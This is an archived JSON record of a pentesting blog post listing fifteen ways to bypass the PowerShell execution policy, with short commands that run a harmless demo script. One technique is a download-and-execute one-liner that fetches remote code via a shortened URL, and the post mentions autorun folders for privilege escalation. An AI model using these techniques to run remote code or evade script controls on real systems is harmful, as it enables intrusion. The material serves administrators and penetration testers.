{
	"id": "e23eb8f4-25ac-4f1d-9ce4-ffdcaa12e3f9",
	"created_at": "2026-04-06T01:29:55.229209Z",
	"updated_at": "2026-04-10T13:12:05.277227Z",
	"deleted_at": null,
	"sha1_hash": "90fc941ace355851eb60c813be1e689e23d20af5",
	"title": "15 Ways to Bypass the PowerShell Execution Policy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 321459,
	"plain_text": "15 Ways to Bypass the PowerShell Execution Policy\r\nBy Scott Sutherland\r\nPublished: 2022-12-16 · Archived: 2026-04-06 00:42:12 UTC\r\nBy default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can\r\nbe a hurdle for penetration testers, sysadmins, and developers, but it doesn’t have to be. In this blog I’ll cover 15\r\nways to bypass the PowerShell execution policy without having local administrator rights on the system. I’m sure\r\nthere are many techniques that I’ve missed (or simply don’t know about), but hopefully this cheat sheet will offer\r\na good start for those who need it.\r\nThe PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be\r\nrun on the system. By default it is set to “Restricted“, which basically means none. However, it’s important to\r\nunderstand that the setting was never meant to be a security control. Instead, it was intended to prevent\r\nadministrators from shooting themselves in the foot. That’s why there are so many options for working around it.\r\nIncluding a few that Microsoft has provided. For more information on the execution policy settings and other\r\ndefault security controls in PowerShell I suggest reading Carlos Perez’s blog. He provides a nice overview.\r\nWhy Would I Want to Bypass the Execution Policy?\r\nAutomation seems to be one of the more common responses I hear from people, but below are a few other reasons\r\nPowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:\r\nNative to Windows\r\nAble to call the Windows API\r\nAble to run commands without writing to the disk\r\nAble to avoid detection by Anti-virus\r\nAlready flagged as “trusted” by most application white list solutions\r\nA medium used to write many open source pentest toolkits\r\nHow to View the Execution Policy\r\nBefore being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the\r\n“Restricted” execution policy. You can take a look at the current configuration with the “Get-ExectionPolicy”\r\nPowerShell command. If you’re looking at the setting for the first time it’s likely set to “Restricted” as shown\r\nbelow.\r\nPS C:\u003e Get-ExecutionPolicy\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 1 of 10\n\nIt’s also worth noting that the execution policy can be set at different levels on the system. To view a list of them\r\nuse the command below. For more information you can check out Microsoft’s “Set-ExecutionPolicy” page here.\r\nGet-ExecutionPolicy -List | Format-Table -AutoSize\r\nLab Setup Notes\r\nIn the examples below I will use a script named runme.ps1 that contains the following PowerShell command to\r\nwrite a message to the console:\r\nWrite-Host \"My voice is my passport, verify me.\"\r\nWhen I attempt to execute it on a system configured with the default execution policy I get the following error:\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 2 of 10\n\nIf your current policy is too open and you want to make it more restrictive to test the techniques below, then run\r\nthe command “Set-ExecutionPolicy Restricted” from an administrator PowerShell console. Ok – enough of my\r\nbabbling – below are 15 ways to bypass the PowerShell execution policy restrictions.\r\nBypassing the PowerShell Execution Policy\r\n1. Paste the Script into an Interactive PowerShell Console\r\nCopy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that\r\nyou will be limited by your current user’s privileges. This is the most basic example and can be handy for running\r\nquick scripts when you have an interactive console. Also, this technique does not result in a configuration change\r\nor require writing to disk.\r\n2. Echo the Script and Pipe it to PowerShell Standard In\r\nSimply ECHO your script into PowerShell standard input. This technique does not result in a configuration\r\nchange or require writing to disk.\r\nEcho Write-Host \"My voice is my passport, verify me.\" | PowerShell.exe -noprofile -\r\n3. Read Script from a File and Pipe to PowerShell Standard In\r\nUse the Windows “type” command or PowerShell “Get-Content” command to read your script from the disk and\r\npipe it into PowerShell standard input. This technique does not result in a configuration change, but does require\r\nwriting your script to disk. However, you could read it from a network share if you’re trying to avoid writing to\r\nthe disk.\r\nExample 1: Get-Content PowerShell command\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 3 of 10\n\nGet-Content .runme.ps1 | PowerShell.exe -noprofile -\r\nExample 2: Type command\r\nTYPE .runme.ps1 | PowerShell.exe -noprofile -\r\n4. Download Script from URL and Execute with Invoke Expression\r\nThis technique can be used to download a PowerShell script from the internet and execute it without having to\r\nwrite to disk. It also doesn’t result in any configuration changes. I have seen it used in many creative ways, but\r\nmost recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.\r\npowershell -nop -c \"iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')\"\r\n5. Use the Command Switch\r\nThis technique is very similar to executing a script via copy and paste, but it can be done without the interactive\r\nconsole. It’s nice for simple script execution, but more complex scripts usually end up with parsing errors. This\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 4 of 10\n\ntechnique does not result in a configuration change or require writing to disk.\r\nExample 1: Full command\r\nPowershell -command \"Write-Host 'My voice is my passport, verify me.'\"\r\nExample 2: Short command\r\nPowershell -c \"Write-Host 'My voice is my passport, verify me.'\"\r\nIt may also be worth noting that you can place these types of PowerShell commands into batch files and place\r\nthem into autorun locations (like the all users startup folder) to help during privilege escalation.\r\n6. Use the EncodeCommand Switch\r\nThis is very similar to the “Command” switch, but all scripts are provided as a Unicode/base64 encoded string.\r\nEncoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the\r\n“Command” switch. This technique does not result in a configuration change or require writing to disk. The\r\nsample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for\r\nreducing the size of the encoded commands if they start getting too long.\r\nExample 1: Full command\r\n$command = \"Write-Host 'My voice is my passport, verify me.'\"\r\n$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)\r\n$encodedCommand = [Convert]::ToBase64String($bytes)\r\npowershell.exe -EncodedCommand $encodedCommand\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 5 of 10\n\nExample 2: Short command using encoded string\r\npowershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAc\r\n7. Use the Invoke-Command Command\r\nThis is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive\r\nPowerShell console or one liner using the “Command” switch, but the cool thing is that it can be used to execute\r\ncommands against remote systems where PowerShell remoting has been enabled. This technique does not result in\r\na configuration change or require writing to disk.\r\ninvoke-command -scriptblock {Write-Host \"My voice is my passport, verify me.\"}\r\nBased on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote\r\ncomputer and apply it to the local computer.\r\ninvoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force\r\n8. Use the Invoke-Expression Command\r\nThis is another one that’s typically executed through an interactive PowerShell console or one liner using the\r\n“Command” switch. This technique does not result in a configuration change or require writing to disk. Below\r\nI’ve listed are a few common ways to use Invoke-Expression to bypass the execution policy.\r\nExample 1: Full command using Get-Content\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 6 of 10\n\nGet-Content .runme.ps1 | Invoke-Expression\r\nExample 2: Short command using Get-Content\r\nGC .runme.ps1 | iex\r\n9. Use the “Bypass” Execution Policy Flag\r\nThis is a nice flag added by Microsoft that will bypass the execution policy when you’re executing scripts from a\r\nfile. When this flag is used Microsoft states that “Nothing is blocked and there are no warnings or prompts”. This\r\ntechnique does not result in a configuration change or require writing to disk.\r\nPowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1\r\n10. Use the “Unrestricted” Execution Policy Flag\r\nThis similar to the “Bypass” flag. However, when this flag is used Microsoft states that it “Loads all configuration\r\nfiles and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted\r\nfor permission before it runs.” This technique does not result in a configuration change or require writing to disk.\r\nPowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 7 of 10\n\n11. Use the “Remote-Signed” Execution Policy Flag\r\nCreate your script then follow the tutorial written by Carlos Perez to sign it. Finally, run it using the command\r\nbelow:\r\nPowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1\r\n12. Disable ExecutionPolicy by Swapping out the AuthorizationManager\r\nThis is one of the more creative approaches. The function below can be executed via an interactive PowerShell\r\nconsole or by using the “command” switch. Once the function is called it will swap out the\r\n“AuthorizationManager” with null. As a result, the execution policy is essentially set to unrestricted for the\r\nremainder of the session. This technique does not result in a persistant configuration change or require writing to\r\ndisk. However, it the change will be applied for the duration of the session.\r\nfunction Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield(\"_context\",\"nonpublic\r\nDisable-ExecutionPolicy .runme.ps1\r\n13. Set the ExcutionPolicy for the Process Scope\r\nAs we saw in the introduction, the execution policy can be applied at many levels. This includes the process which\r\nyou have control over. Using this technique the execution policy can be set to unrestricted for the duration of your\r\nSession. Also, it does not result in a configuration change, or require writing to the disk.\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 8 of 10\n\nSet-ExecutionPolicy Bypass -Scope Process\r\n14. Set the ExcutionPolicy for the CurrentUser Scope via Command\r\nThis option is similar to the process scope, but applies the setting to the current user’s environment persistently by\r\nmodifying a registry key. Also, it does not result in a configuration change, or require writing to the disk.\r\nSet-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted\r\n15. Set the ExcutionPolicy for the CurrentUser Scope via the Registry\r\nIn this example I’ve shown how to change the execution policy for the current user’s environment persistently by\r\nmodifying a registry key directly.\r\nHKEY_CURRENT_USERSoftwareMicrosoftPowerShell1ShellIdsMicrosoft.PowerShell\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 9 of 10\n\nWrap Up Summary\r\nI think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins,\r\nor penetration testing. Microsoft never intended it to be a security control. Which is why there are so many options\r\nfor bypassing it. Microsoft was nice enough to provide some native options and the security community has also\r\ncome up with some really fun tricks. Thanks to all of those people who have contributed through blogs and\r\npresentations. To the rest, good luck in all your PowerShell adventures and don’t forget to hack responsibly. 😉\r\nLooking for a strategic partner to critically test your Windows systems? Explore NetSPI’s network penetration\r\ntesting services.\r\nReferences\r\nhttps://obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html\r\nhttps://technet.microsoft.com/en-us/library/hh849694.aspx\r\nhttps://technet.microsoft.com/en-us/library/hh849812.aspx\r\nhttps://technet.microsoft.com/en-us/library/hh849893.aspx\r\nhttps://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html\r\nhttps://www.hanselman.com/blog/SigningPowerShellScripts.aspx\r\nhttps://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html\r\nSource: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/"
	],
	"report_names": [
		"15-ways-to-bypass-the-powershell-execution-policy"
	],
	"threat_actors": [],
	"ts_created_at": 1775438995,
	"ts_updated_at": 1775826725,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/90fc941ace355851eb60c813be1e689e23d20af5.pdf",
		"text": "https://archive.orkl.eu/90fc941ace355851eb60c813be1e689e23d20af5.txt",
		"img": "https://archive.orkl.eu/90fc941ace355851eb60c813be1e689e23d20af5.jpg"
	}
}